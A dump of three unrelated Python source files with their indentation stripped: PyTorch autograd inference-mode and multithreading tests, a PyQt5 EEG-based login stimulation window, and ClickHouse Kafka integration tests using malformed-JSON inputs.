self.assertTrue(tmp.requires_grad)
self.assertTrue(torch.is_inference(tmp))
tmp = torch.ones(1, 2, 3).requires_grad_(False)
self.assertFalse(tmp.requires_grad)
self.assertTrue(torch.is_inference(tmp))
def test_inference_mode_existing_autograd_session(self):
s = torch.ones(1, 2, 3, requires_grad=True)
a = s.clone()
# `a` gets saved outside of inference mode
out = a * a
with torch.inference_mode():
a.add_(2)
self.assertFalse(torch.is_inference(a))
# tensors created outside of inference mode aren't
# inference tensors, so they will still have their
# version counters tracked
err_msg = ("one of the variables needed for gradient computation has been "
"modified by an inplace operation")
with self.assertRaisesRegex(RuntimeError, err_msg):
out.backward(torch.ones_like(out))
def test_inference_mode_inf_tensor_in_inf_mode_functional_op(self):
def functional_op(x):
return x * x
with torch.inference_mode():
for requires_grad in (True, False):
c = torch.ones(1, 2, 3, requires_grad=requires_grad)
# performing a non-view operation produces an inference tensor
# that does not require grad
func_out = functional_op(c)
self.assertTrue(torch.is_inference(func_out))
self.assertFalse(func_out.requires_grad)
def test_inference_mode_inf_tensor_in_inf_mode_inplace_op(self):
@torch.inference_mode()
def run_test(fn):
for requires_grad in (True, False):
c = torch.ones(1, 2, 3, requires_grad=requires_grad)
# after performing inplace operation, tensor is still
# an inference tensor
fn(c)
self.assertTrue(torch.is_inference(c))
self.assertEqual(c.requires_grad, requires_grad)
run_test(lambda x: x.add_(2))
run_test(lambda x: x.transpose_(0, 1))
def test_inference_mode_inf_tensor_in_inf_mode_view_op(self):
with torch.inference_mode():
for requires_grad in (True, False):
c = torch.ones(1, 2, 3, requires_grad=requires_grad)
# performing a view operation produces an inference tensor
# that does not require grad
view_out = c.view(-1)
self.assertTrue(torch.is_inference(view_out))
self.assertFalse(view_out.requires_grad)
def test_inference_mode_inf_tensor_in_normal_mode_functional_op(self):
def functional_op(x):
return x * x
for requires_grad in (True, False):
with torch.inference_mode():
c = torch.ones(1, 2, 3, requires_grad=requires_grad)
func_out = functional_op(c)
self.assertFalse(torch.is_inference(func_out))
self.assertFalse(func_out.requires_grad)
self.assertTrue(func_out.is_leaf)
def test_inference_mode_inf_tensor_in_normal_mode_inplace_op(self):
def run_test(fn):
for requires_grad in (False, True):
with torch.inference_mode():
c = torch.ones(1, 2, 3, requires_grad=requires_grad)
if requires_grad:
# leaf variable that requires grad is being used in an inplace
# operation when requires_grad=True
pass
else:
err_msg = "Inplace update to inference tensor outside InferenceMode"
with self.assertRaisesRegex(RuntimeError, err_msg):
fn(c)
run_test(lambda x: x.add_(2))
run_test(lambda x: x.transpose_(0, 1))
def test_inference_mode_inf_tensor_in_normal_mode_view_op(self):
for requires_grad in (True, False):
with torch.inference_mode():
c = torch.ones(1, 2, 3, requires_grad=requires_grad)
out = c.view(-1)
self.assertTrue(torch.is_inference(out))
self.assertFalse(out.requires_grad)
self.assertFalse(out._is_view())
self.assertTrue(out.is_leaf)
def test_normal_tensor_inplace_output_in_inference_mode(self):
def run_test(fn):
for requires_grad in (True, False):
s = torch.ones(1, 2, 3, requires_grad=requires_grad)
a = s.clone()
with torch.inference_mode():
fn(a)
self.assertFalse(torch.is_inference(a))
self.assertEqual(a.requires_grad, requires_grad)
# inplace -> inplace
fn(a)
self.assertFalse(torch.is_inference(a))
self.assertEqual(a.requires_grad, requires_grad)
# inplace -> inplace -> view
view_out = a.view(-1)
self.assertFalse(torch.is_inference(view_out))
self.assertEqual(view_out.requires_grad, requires_grad)
run_test(lambda x: x.add_(2))
run_test(lambda x: x.transpose_(0, 1))
def test_normal_tensor_inplace_output_in_normal_mode(self):
def run_test(fn):
for requires_grad in (True, False):
s = torch.ones(1, 2, 3, requires_grad=requires_grad)
a = s.clone()
with torch.inference_mode():
fn(a)
self.assertFalse(torch.is_inference(a))
self.assertEqual(a.requires_grad, requires_grad)
fn(a)
self.assertFalse(torch.is_inference(a))
self.assertEqual(a.requires_grad, requires_grad)
# inplace -> inplace
fn(a)
self.assertFalse(torch.is_inference(a))
self.assertEqual(a.requires_grad, requires_grad)
# inplace -> inplace -> view
view_out = a.view(-1)
self.assertFalse(torch.is_inference(view_out))
self.assertEqual(view_out.requires_grad, requires_grad)
run_test(lambda x: x.add_(2))
run_test(lambda x: x.transpose_(0, 1))
def test_normal_tensor_view_output_in_inference_mode(self):
for requires_grad in (True, False):
s = torch.ones(1, 2, 3, requires_grad=requires_grad)
a = s.clone()
with torch.inference_mode():
out = a.view(-1)
self.assertFalse(torch.is_inference(out))
self.assertEqual(out.requires_grad, requires_grad)
self.assertTrue(out._is_view())
# view -> view
tmp = out.view(-1)
self.assertFalse(torch.is_inference(tmp))
self.assertEqual(tmp.requires_grad, requires_grad)
self.assertTrue(tmp._is_view())
self.assertTrue(tmp.is_leaf)
# view -> view -> inplace
self.assertTrue(torch.is_inference_mode_enabled())
tmp.add_(2)
self.assertFalse(torch.is_inference(tmp))
self.assertEqual(tmp.requires_grad, requires_grad)
# Accessing is_leaf in python tries to update grad_fn and raises:
# A view was created in inference mode and its base or
# another view of its base has been modified inplace in normal mode
# tmp.is_leaf
self.assertEqual(a._version, tmp._version)
def test_normal_tensor_view_output_in_normal_mode(self):
def functional_op(x):
return x * x
for requires_grad in (True, False):
s = torch.ones(1, 2, 3, requires_grad=requires_grad)
a = s.clone()
with torch.inference_mode():
out = a.view(-1)
self.assertFalse(torch.is_inference(out))
self.assertEqual(out.requires_grad, requires_grad)
self.assertTrue(out._is_view())
self.assertTrue(out.is_leaf)
tmp = functional_op(out)
self.assertFalse(torch.is_inference(tmp))
self.assertEqual(tmp.requires_grad, requires_grad)
if requires_grad:
err_msg = "A view was created in inference mode and is being modified inplace"
with self.assertRaisesRegex(RuntimeError, err_msg):
out.add_(2)
pass
else:
out.add_(2)
tmp = out.view(2, 3)
self.assertFalse(torch.is_inference(tmp))
self.assertEqual(tmp.requires_grad, requires_grad)
def test_mix_inference_and_normal_tensor_functional_op(self):
for requires_grad in (True, False):
s = torch.ones(1, 2, 3, requires_grad=requires_grad)
with torch.inference_mode():
c = torch.ones(1, 2, 3, requires_grad=requires_grad)
# add is safe since it doesn't save any variable for backward
out = c.add(s)
self.assertFalse(torch.is_inference(out))
self.assertEqual(out.requires_grad, requires_grad)
if requires_grad:
# leaf inference tensor with requires_grad=True can still have gradient
out.backward(torch.ones_like(out))
self.assertEqual(c.grad, torch.ones_like(c))
if requires_grad:
err_msg = "Inference tensors cannot be saved for backward"
with self.assertRaisesRegex(RuntimeError, err_msg):
c * s
# inference tensor in TensorList input
inputs = [s, c]
with self.assertRaisesRegex(RuntimeError, err_msg):
torch.stack(inputs)
def test_mix_inference_and_normal_tensor_inplace_op(self):
for requires_grad in (True, False):
s = torch.ones(1, 2, 3, requires_grad=requires_grad)
a = s.clone()
with torch.inference_mode():
c = torch.ones(1, 2, 3)
self.assertTrue(torch.is_inference(c))
if requires_grad:
err_msg = "Inference tensors cannot be saved for backward"
with self.assertRaisesRegex(RuntimeError, err_msg):
a.mul_(c)
# inference tensor in TensorList input
err_msg = ("out=... arguments don't support automatic differentiation, "
"but one of the arguments requires grad")
with self.assertRaisesRegex(RuntimeError, err_msg):
torch.mul(s, s, out=c)
else:
a.mul_(c)
err_msg = "Inplace update to inference tensor outside InferenceMode is not allowed"
with self.assertRaisesRegex(RuntimeError, err_msg):
torch.mul(s, s, out=c)
def test_mix_inference_and_normal_tensor_view_op(self):
for requires_grad in (True, False):
s = torch.ones(1, 2, 3, requires_grad=requires_grad)
with torch.inference_mode():
c = torch.ones(1, 2, 3)
# view_as is a composite op which calls view with only one
# tensor argument, so there are no mixed inference and normal
# tensor inputs for view ops
tmp1 = c.view_as(s)
self.assertTrue(torch.is_inference(tmp1))
self.assertFalse(tmp1.requires_grad)
# this is fine since it's equivalent to s.view(c.sizes()), which
# isn't a mixed input scenario
tmp2 = s.view_as(c)
self.assertFalse(torch.is_inference(tmp2))
self.assertEqual(tmp2.requires_grad, requires_grad)
def test_inference_mode_handle_direct_view_on_rebase(self):
def run_test(fn):
for requires_grad in (True, False):
s = torch.ones(1, 2, 3, requires_grad=requires_grad)
a = s.clone()
with torch.inference_mode():
view_out = a.view_as(a)
if requires_grad:
err_msg = "A view was created in inference mode and is being modified inplace"
with self.assertRaisesRegex(RuntimeError, err_msg):
fn(view_out)
pass
else:
fn(view_out)
run_test(lambda x: x.add_(2))
run_test(lambda x: x.transpose_(0, 1))
def test_inference_mode_handle_indirect_view_on_rebase(self):
def run_test(fn):
for requires_grad in (True, False):
s = torch.ones(1, 2, 3, requires_grad=requires_grad)
a = s.clone()
with torch.inference_mode():
view_out = a.view(-1)
fn(a)
if requires_grad:
err_msg = "A view was created in inference mode and its base or another view "
with self.assertRaisesRegex(RuntimeError, err_msg):
view_out.grad_fn
pass
else:
view_out.grad_fn
run_test(lambda x: x.add_(2))
run_test(lambda x: x.transpose_(0, 1))
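# Condensed illustration (not one of the original tests) of the inference-mode
# semantics exercised by TestAutogradInferenceMode above. It is never called by
# the test runner; it only summarizes the documented behavior in one place.
def _inference_mode_summary_sketch():
    s = torch.ones(2, 2, requires_grad=True)
    with torch.inference_mode():
        # Tensors created inside inference mode are inference tensors.
        c = torch.ones(2, 2)
        assert torch.is_inference(c)
    # add is safe outside inference mode: it saves nothing for backward.
    out = c.add(s)
    assert not torch.is_inference(out)
    # mul would need to save its inputs for backward, and inference tensors
    # cannot be saved, so this raises a RuntimeError.
    try:
        c * s
    except RuntimeError:
        pass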
class TestMultithreadAutograd(TestCase):
def _run_py_multithread_fn(self, fn, args=(), num_threads=10, kwargs=None):
threads = []
for _ in range(num_threads):
p = threading.Thread(target=fn, args=args)
p.start()
threads.append(p)
for p in threads:
p.join()
def test_simple_backward(self):
# simple multithreaded backward where threads are created at the beginning of training
# and everything else (inputs, operations, etc.) is trained separately per thread
def train_fn():
x = torch.ones(5, 5, requires_grad=True)
y = (x + 3) * (x + 4) * 0.5
y.sum().backward()
self.assertEqual(x.grad, x + 3.5)
self._run_py_multithread_fn(train_fn)
def test_simple_backward_same_input(self):
# simple multithreaded backward with only shared inputs (this is common
# for things like Hogwild multithreaded training with multiple CPU threads)
def train_fn_backward(x):
y = (x + 3) * (x + 4) * 0.5
y.sum().backward()
x = torch.ones(5, 5, requires_grad=True)
self._run_py_multithread_fn(train_fn_backward, (x,))
# Since we are calling backward from multiple threads
# and all threads share the same input, when we do backward
# concurrently, different backwards will all accumulate to
# the same .grad for each input, and the gradients should
# be equal to num_threads * gradient
self.assertEqual(x.grad, 10 * (x + 3.5))
def train_fn_grad(x):
y = (x + 3) * (x + 4) * 0.5
grads = torch.autograd.grad(y.sum(), x)
self.assertEqual(len(grads), 1)
self.assertEqual(grads[0], x + 3.5)
# since we use the functional grad() api, gradients will not
# be accumulated into the same place and should all be the same
self._run_py_multithread_fn(train_fn_grad, (x,))
def test_python_thread_in_middle(self):
# User might write a network that starts on one CPU thread, then runs its second half
# concurrently with other threads (either via python threading or fork/join calls),
# then calls backward()/grad() on BOTH threads, like a Y pattern from input at the
# bottom to output at the top. This way part of the GraphTask is being shared across
# different threads and we need to ensure the user specifies retain_graph=True, otherwise
# we error out with the correct error message
# Case 1: multiple backward with python threads, retain_graph=False
# should throw error in some threads with no retain_graph.
success_vs_raises = [0, 0]
def train_fn_no_retain_graph(x):
y = x + x ** 2
try:
y.sum().backward()
success_vs_raises[0] += 1
except RuntimeError as error:
success_vs_raises[1] += 1
self.assertRegex(str(error), "Specify retain_graph=True")
x_no_retain = torch.ones(5, 5, requires_grad=True)
y_no_retain = x_no_retain + x_no_retain ** 2
self._run_py_multithread_fn(train_fn_no_retain_graph, (y_no_retain,), num_threads=5)
# at least one thread will succeed in this case; all other threads should raise
# an error recommending that the user specify retain_graph=True
self.assertTrue(success_vs_raises[0] >= 1)
# multiple backward with python threads, no error with retain_graph=True
def train_fn_retain_graph(x):
y = x + x ** 2
y.sum().backward(retain_graph=True)
x_retain = torch.ones(5, 5, requires_grad=True)
y_retain = x_retain + x_retain ** 2
self._run_py_multithread_fn(train_fn_retain_graph, (y_retain,), num_threads=5)
# result should equal num_threads * gradient
self.assertEqual(x_retain.grad, 5 * (4 * x_retain ** 3 + 6 * (x_retain ** 2) + 4 * x_retain + 1))
def test_fork_join_in_middle(self):
# multiple backward with jit threads (fork/join primitive)
# similar to test_python_thread_in_middle, we test with retain_graph=False/True
# Case 1: multiple grad() calls with jit threads, retain_graph=False
# should throw error in some threads with no retain_graph.
@torch.jit.script
def train_fn_jit_no_retain(middle, orig_x):
y = middle + middle ** 2
return torch.autograd.grad([y.sum()], [orig_x])
@torch.jit.script
def train_fn_fork_join_calls_no_retain(x):
y_no_retain = (x + 3) * (x + 4) * 0.5
fut = torch.jit._fork(train_fn_jit_no_retain, y_no_retain, x)
grad_hat = train_fn_jit_no_retain(y_no_retain, x)
grad = torch.jit._wait(fut)
return grad, grad_hat
try:
train_fn_fork_join_calls_no_retain(torch.randn(5, 5, requires_grad=True))
except RuntimeError as error:
self.assertRegex(str(error), "Specify retain_graph=True")
# Case 2: no error with retain_graph=True
@torch.jit.script
def train_fn_jit_retain(middle, orig_x):
y = middle + middle ** 2
return torch.autograd.grad([y.sum()], [orig_x], retain_graph=True)
@torch.jit.script
def train_fn_fork_join_calls_retain(x):
y_retain = (x + 3) * (x + 4) * 0.5
fut1 = torch.jit._fork(train_fn_jit_retain, y_retain, x)
fut2 = torch.jit._fork(train_fn_jit_retain, y_retain, x)
grad = train_fn_jit_retain(y_retain, x)
grad1 = torch.jit._wait(fut1)
grad2 = torch.jit._wait(fut2)
return grad, grad1, grad2
grad, grad1, grad2 = train_fn_fork_join_calls_retain(torch.randn(5, 5, requires_grad=True))
self.assertEqual(grad, grad1)
self.assertEqual(grad, grad2)
def test_preserve_backtrace(self):
class Foo(torch.autograd.Function):
@staticmethod
def forward(ctx, input):
return input
@staticmethod
def backward(ctx, *grad):
raise ValueError("something")
t = torch.rand(10, requires_grad=True)
try:
Foo.apply(t).sum().backward()
except Exception:
import traceback
tb = sys.exc_info()[2]
tb_str = "\n".join(traceback.format_tb(tb))
self.assertTrue('raise ValueError("something")' in tb_str)
# TODO(@anjali411): add an OpInfo based test for torch.cat
# Issue: https://github.com/pytorch/pytorch/issues/51627
def test_cat_r_to_c(self):
inp_c = torch.rand(3, 2, dtype=torch.cdouble, requires_grad=True)
inp_r = torch.randn(3, 2, dtype=torch.double, requires_grad=True)
def fn(x1, x2):
return torch.cat((x1, x2), dim=-1)
torch.autograd.gradcheck(fn, [inp_r, inp_c], check_forward_ad=True)
torch.autograd.gradcheck(fn, [inp_c, inp_r], check_forward_ad=True)
# e.g., TestAutogradDeviceTypeCPU and TestAutogradDeviceTypeCUDA
instantiate_device_type_tests(
TestAutogradDeviceType,
globals(),
except_for=None
)
if __name__ == '__main__':
run_tests()
|
login_stimulation_window.py
|
import time
import numpy as np
from threading import Thread
import os
from datetime import datetime
from PyQt5 import QtWidgets, uic
from PyQt5.QtCore import QTimer
from PyQt5.QtGui import QPixmap
from PyQt5.QtWidgets import QDesktopWidget
import nas.src.config as config
from nas.src.eeg_recorder import EEGRecorder
from nas.src.data_processing import DataProcessing
from nas.src.stimuli_creator import StimuliCreator
from nas.src.classifier import Classifier
from nas.gui.end_login_window import EndLoginWindow
directory_path = os.path.dirname(os.path.abspath(__file__))
ui_path = os.path.join(directory_path, "designs" + os.sep + "login_stimuli_window.ui")
Ui_RegWindow, QtBaseClass = uic.loadUiType(ui_path)
class LoginStimulationPresentation(QtWidgets.QMainWindow, Ui_RegWindow):
"""
Class for displaying the login stimulation window of the graphical user interface and its manipulation.
The main function of this class is to display individual stimuli to the user and record his EEG signals in his
reactions to them. These reactions are then classified to indicate whether the user is granted access.
:param reg_user: The object of the registered user.
:type reg_user: ``user``
"""
def __init__(self, reg_user):
QtWidgets.QMainWindow.__init__(self)
Ui_RegWindow.__init__(self)
self.setupUi(self)
self.reg_user = reg_user # Object with user, his name, surname and image/stimulus.
self.stimuli_types_array = "" # Array of stimulus types.
self.stimuli_timestamps = np.array([]) # Array of stimuli timestamps.
self.eeg_recorder = None
self.recording_thread = None
self.end_login_window = None
self.stimuli_creator = StimuliCreator(self.reg_user.get_user_stimulus())
# Start timer.
self.starting_time = config.STARTING_TIME
self.FLAG_start_timer = True
self.StartTimer = QTimer(self)
self.StartTimer.timeout.connect(self.update_start_time)
# Stimuli timer.
self.stimuli_time = 0
self.num_of_stimuli = 0
self.FLAG_stimuli_timer = True
self.StimuliTimer = QTimer(self)
self.StimuliTimer.timeout.connect(self.update_stimuli)
# Flags for stimuli type.
self.FLAG_stimulus = False
self.FLAG_blank = True
self.FLAG_change = True # Flag of change, to not call pixmap method multiple times.
self.time_memory = 0 # Memory of time.
self.set_up_window()
def set_up_window(self):
"""
Makes other window settings, such as connecting buttons, etc.
"""
# Center window to screen.
qt_rectangle = self.frameGeometry()
center_point = QDesktopWidget().availableGeometry().center()
qt_rectangle.moveCenter(center_point)
self.move(qt_rectangle.topLeft())
# Hide unnecessary widgets.
self.StimuliLayoutWidget.hide()
self.StimuliImage.hide()
# Connect ui buttons to methods.
self.StartRecording.clicked.connect(self.start_recording)
def start_recording(self):
"""
Starts recording EEG signals. It is necessary to use a thread for proper functionality.
"""
self.StimuliInfoWidget.hide()
self.StimuliLayoutWidget.show()
self.StartTimer.start(1000)
self.eeg_recorder = EEGRecorder()
self.recording_thread = Thread(target=self.eeg_recorder.start_record)
self.recording_thread.daemon = True # Thread exits if app is closed.
self.recording_thread.start()
def update_start_time(self):
"""
Stimulation start timer.
The default is set to 5 seconds, but this time can be changed in the ``config.py`` file.
"""
if self.FLAG_start_timer:
self.starting_time -= 1
self.StartTimerLabel.setText(str(self.starting_time))
if self.starting_time == 0:
self.FLAG_start_timer = False
self.StartTimer.stop()
self.StartTimerLabel.hide()
self.stimulation()
def stimulation(self):
"""
Starts the timer of the stimulation itself.
"""
self.StimuliTimer.start(10)  # 10 ms tick (0.01 s).
self.StimuliImage.show()
def update_stimuli(self):
"""
Updates the stimulus type.
StimuliCreator is used.
Each stimulus is shown for 0.3 seconds, followed by 1 second of blank screen.
"""
if self.FLAG_stimuli_timer:
self.stimuli_time += 0.01
self.stimuli_time = round(self.stimuli_time, 2)
if self.num_of_stimuli == config.STIMULI_NUM + 1: # Number of stimuli +1 because of time synchronization.
self.FLAG_stimuli_timer = False
self.StimuliTimer.stop()
self.eeg_recorder.stop_record() # Stop recording.
self.get_access_data()
if self.FLAG_stimuli_timer:
if self.FLAG_stimulus:
if self.FLAG_change:
pixmap = self.stimuli_creator.randomized_stimuli()
# Save stimuli timestamps.
stimuli_timestamp = time.time()
self.stimuli_timestamps = np.append(self.stimuli_timestamps, stimuli_timestamp)
self.StimuliImage.setPixmap(QPixmap(pixmap))
self.FLAG_change = False
if self.stimuli_time == round(self.time_memory + 0.3, 2):  # TODO: add random jitter to the 0.3 s duration
self.time_memory = self.stimuli_time
self.num_of_stimuli += 1
self.FLAG_stimulus = False
self.FLAG_blank = True
self.FLAG_change = True
if self.FLAG_blank:
if self.FLAG_change:
self.StimuliImage.clear()
self.FLAG_change = False
if self.stimuli_time == round(self.time_memory + 1.0, 2):  # TODO: add random jitter to the 1.0 s duration
self.time_memory = self.stimuli_time
self.FLAG_stimulus = True
self.FLAG_blank = False
self.FLAG_change = True
def get_access_data(self):
"""
Classifies access EEG data.
"""
data = self.eeg_recorder.get_rec_data()
timestamps = self.eeg_recorder.get_rec_timestamps()
data_processing = DataProcessing(data, timestamps, self.stimuli_timestamps, config.STIMULI_NUM)
data_processing.filter_data()
# login data & types
login_stimuli_windows = data_processing.create_time_windows()
login_stimuli_types = self.stimuli_creator.get_stimuli_types()
# reg data
reg_stimuli_windows, reg_stimuli_types = self.reg_user.get_reg_data()
# TODO
self.StimuliImage.setText("The classification model is being trained, please wait.")
# CLASSIFIER
classifier = Classifier(login_stimuli_windows, reg_stimuli_windows, reg_stimuli_types, login_stimuli_types)
# Only needed if LDA is used.
classifier.prepare_lda_data()
classifier.prepare_cnn_data()
classifier.classify(config.CLASSIFICATION)
access_right = classifier.determine_access_right()
self.end_log_in(access_right)
def end_log_in(self, access_right):
self.end_login_window = EndLoginWindow(self.reg_user, access_right)
self.end_login_window.showMaximized()
self.hide()
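# Illustrative launch sketch (not part of the original module): how this window
# might be started from a login flow. The `reg_user` argument is whatever
# registered-user object the application provides; anything exposing
# get_user_stimulus() and get_reg_data(), as used by the class above, would do.
def _example_launch_login_stimulation(reg_user):
    import sys
    # A QApplication must exist before any widget is created.
    app = QtWidgets.QApplication(sys.argv)
    window = LoginStimulationPresentation(reg_user)
    window.showMaximized()
    sys.exit(app.exec_())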
|
test.py
|
import json
import os.path as p
import random
import socket
import threading
import time
import logging
import io
import string
import avro.schema
import avro.io
import avro.datafile
from confluent_kafka.avro.cached_schema_registry_client import CachedSchemaRegistryClient
from confluent_kafka.avro.serializer.message_serializer import MessageSerializer
import kafka.errors
import pytest
from google.protobuf.internal.encoder import _VarintBytes
from helpers.client import QueryRuntimeException
from helpers.cluster import ClickHouseCluster
from helpers.network import PartitionManager
from helpers.test_tools import TSV
from kafka import KafkaAdminClient, KafkaProducer, KafkaConsumer, BrokerConnection
from kafka.protocol.admin import DescribeGroupsRequest_v1
from kafka.protocol.group import MemberAssignment
from kafka.admin import NewTopic
# protoc --version
# libprotoc 3.0.0
# # to create kafka_pb2.py
# protoc --python_out=. kafka.proto
from . import kafka_pb2
from . import social_pb2
# TODO: add test for run-time offset update in CH, if we manually update it on Kafka side.
# TODO: add test for SELECT LIMIT is working.
cluster = ClickHouseCluster(__file__)
instance = cluster.add_instance('instance',
main_configs=['configs/kafka.xml'],
with_kafka=True,
with_zookeeper=True, # For Replicated Table
macros={"kafka_broker":"kafka1",
"kafka_topic_old":"old",
"kafka_group_name_old":"old",
"kafka_topic_new":"new",
"kafka_group_name_new":"new",
"kafka_client_id":"instance",
"kafka_format_json_each_row":"JSONEachRow"},
clickhouse_path_dir='clickhouse_path')
def get_kafka_producer(port, serializer, retries):
errors = []
for _ in range(retries):
try:
producer = KafkaProducer(bootstrap_servers="localhost:{}".format(port), value_serializer=serializer)
logging.debug("Kafka connection established: localhost:{}".format(port))
return producer
except Exception as e:
errors += [str(e)]
time.sleep(1)
raise Exception("Connection not established, {}".format(errors))
def producer_serializer(x):
return x.encode() if isinstance(x, str) else x
def kafka_create_topic(admin_client, topic_name, num_partitions=1, replication_factor=1, max_retries=50, config=None):
logging.debug(f"Kafka create topic={topic_name}, num_partitions={num_partitions}, replication_factor={replication_factor}")
topics_list = [NewTopic(name=topic_name, num_partitions=num_partitions, replication_factor=replication_factor, topic_configs=config)]
retries = 0
while True:
try:
admin_client.create_topics(new_topics=topics_list, validate_only=False)
logging.debug("Admin client succeed")
return
except Exception as e:
retries += 1
time.sleep(0.5)
if retries < max_retries:
logging.warning(f"Failed to create topic {e}")
else:
raise
def kafka_delete_topic(admin_client, topic, max_retries=50):
result = admin_client.delete_topics([topic])
for (topic, e) in result.topic_error_codes:
if e == 0:
logging.debug(f"Topic {topic} deleted")
else:
logging.error(f"Failed to delete topic {topic}: {e}")
retries = 0
while True:
topics_listed = admin_client.list_topics()
logging.debug(f"TOPICS LISTED: {topics_listed}")
if topic not in topics_listed:
return
else:
retries += 1
time.sleep(0.5)
if retries > max_retries:
raise Exception(f"Failed to delete topics {topic}, {result}")
def kafka_produce(kafka_cluster, topic, messages, timestamp=None, retries=15):
logging.debug("kafka_produce server:{}:{} topic:{}".format("localhost", kafka_cluster.kafka_port, topic))
producer = get_kafka_producer(kafka_cluster.kafka_port, producer_serializer, retries)
for message in messages:
producer.send(topic=topic, value=message, timestamp_ms=timestamp)
producer.flush()
## just to ensure the python client / producer is working properly
def kafka_producer_send_heartbeat_msg(max_retries=50):
kafka_produce(kafka_cluster, 'test_heartbeat_topic', ['test'], retries=max_retries)
def kafka_consume(kafka_cluster, topic):
consumer = KafkaConsumer(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port), auto_offset_reset="earliest")
consumer.subscribe(topics=(topic))
for toppar, messages in list(consumer.poll(5000).items()):
if toppar.topic == topic:
for message in messages:
yield message.value.decode()
consumer.unsubscribe()
consumer.close()
def kafka_produce_protobuf_messages(kafka_cluster, topic, start_index, num_messages):
data = b''
for i in range(start_index, start_index + num_messages):
msg = kafka_pb2.KeyValuePair()
msg.key = i
msg.value = str(i)
serialized_msg = msg.SerializeToString()
data = data + _VarintBytes(len(serialized_msg)) + serialized_msg
producer = KafkaProducer(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port), value_serializer=producer_serializer)
producer.send(topic=topic, value=data)
producer.flush()
logging.debug(("Produced {} messages for topic {}".format(num_messages, topic)))
def kafka_produce_protobuf_messages_no_delimeters(kafka_cluster, topic, start_index, num_messages):
data = ''
producer = KafkaProducer(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
for i in range(start_index, start_index + num_messages):
msg = kafka_pb2.KeyValuePair()
msg.key = i
msg.value = str(i)
serialized_msg = msg.SerializeToString()
producer.send(topic=topic, value=serialized_msg)
producer.flush()
logging.debug("Produced {} messages for topic {}".format(num_messages, topic))
def kafka_produce_protobuf_social(kafka_cluster, topic, start_index, num_messages):
data = b''
for i in range(start_index, start_index + num_messages):
msg = social_pb2.User()
msg.username='John Doe {}'.format(i)
msg.timestamp=1000000+i
serialized_msg = msg.SerializeToString()
data = data + _VarintBytes(len(serialized_msg)) + serialized_msg
producer = KafkaProducer(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port), value_serializer=producer_serializer)
producer.send(topic=topic, value=data)
producer.flush()
logging.debug(("Produced {} messages for topic {}".format(num_messages, topic)))
def avro_message(value):
schema = avro.schema.make_avsc_object({
'name': 'row',
'type': 'record',
'fields': [
{'name': 'id', 'type': 'long'},
{'name': 'blockNo', 'type': 'int'},
{'name': 'val1', 'type': 'string'},
{'name': 'val2', 'type': 'float'},
{'name': 'val3', 'type': 'int'}
]
})
bytes_writer = io.BytesIO()
# writer = avro.io.DatumWriter(schema)
# encoder = avro.io.BinaryEncoder(bytes_writer)
# writer.write(value, encoder)
# DataFileWrite seems to be mandatory to get schema encoded
writer = avro.datafile.DataFileWriter(bytes_writer, avro.io.DatumWriter(), schema)
if isinstance(value, list):
for v in value:
writer.append(v)
else:
writer.append(value)
writer.flush()
raw_bytes = bytes_writer.getvalue()
writer.close()
bytes_writer.close()
return raw_bytes
def avro_confluent_message(schema_registry_client, value):
# type: (CachedSchemaRegistryClient, dict) -> str
serializer = MessageSerializer(schema_registry_client)
schema = avro.schema.make_avsc_object({
'name': 'row',
'type': 'record',
'fields': [
{'name': 'id', 'type': 'long'},
{'name': 'blockNo', 'type': 'int'},
{'name': 'val1', 'type': 'string'},
{'name': 'val2', 'type': 'float'},
{'name': 'val3', 'type': 'int'}
]
})
return serializer.encode_record_with_schema('test_subject', schema, value)
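# Illustrative sketch (not part of the original test suite): producing a single
# Avro-encoded row with the helpers above. The topic name 'avro_example' is a
# hypothetical placeholder; the real tests create their own topics and tables.
def _example_produce_avro_row(kafka_cluster):
    row = {'id': 0, 'blockNo': 0, 'val1': 'AM', 'val2': 0.5, 'val3': 1}
    # avro_message() wraps the row in an Avro container file so the schema
    # travels with the payload, which is why DataFileWriter is used above.
    kafka_produce(kafka_cluster, 'avro_example', [avro_message(row)])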
# Tests
def test_kafka_settings_old_syntax(kafka_cluster):
assert TSV(instance.query("SELECT * FROM system.macros WHERE macro like 'kafka%' ORDER BY macro",
ignore_error=True)) == TSV('''kafka_broker kafka1
kafka_client_id instance
kafka_format_json_each_row JSONEachRow
kafka_group_name_new new
kafka_group_name_old old
kafka_topic_new new
kafka_topic_old old
''')
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka('{kafka_broker}:19092', '{kafka_topic_old}', '{kafka_group_name_old}', '{kafka_format_json_each_row}', '\\n');
''')
# Don't insert malformed messages since old settings syntax
# doesn't support skipping of broken messages.
messages = []
for i in range(50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce(kafka_cluster, 'old', messages)
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
members = describe_consumer_group(kafka_cluster, 'old')
assert members[0]['client_id'] == 'ClickHouse-instance-test-kafka'
# text_desc = kafka_cluster.exec_in_container(kafka_cluster.get_container_id('kafka1'),"kafka-consumer-groups --bootstrap-server localhost:9092 --describe --members --group old --verbose"))
def test_kafka_settings_new_syntax(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = '{kafka_broker}:19092',
kafka_topic_list = '{kafka_topic_new}',
kafka_group_name = '{kafka_group_name_new}',
kafka_format = '{kafka_format_json_each_row}',
kafka_row_delimiter = '\\n',
kafka_client_id = '{kafka_client_id} test 1234',
kafka_skip_broken_messages = 1;
''')
messages = []
for i in range(25):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce(kafka_cluster, 'new', messages)
# Insert couple of malformed messages.
kafka_produce(kafka_cluster, 'new', ['}{very_broken_message,'])
kafka_produce(kafka_cluster, 'new', ['}another{very_broken_message,'])
messages = []
for i in range(25, 50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce(kafka_cluster, 'new', messages)
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
members = describe_consumer_group(kafka_cluster, 'new')
assert members[0]['client_id'] == 'instance test 1234'
def test_kafka_json_as_string(kafka_cluster):
kafka_produce(kafka_cluster, 'kafka_json_as_string', ['{"t": 123, "e": {"x": "woof"} }', '', '{"t": 124, "e": {"x": "test"} }',
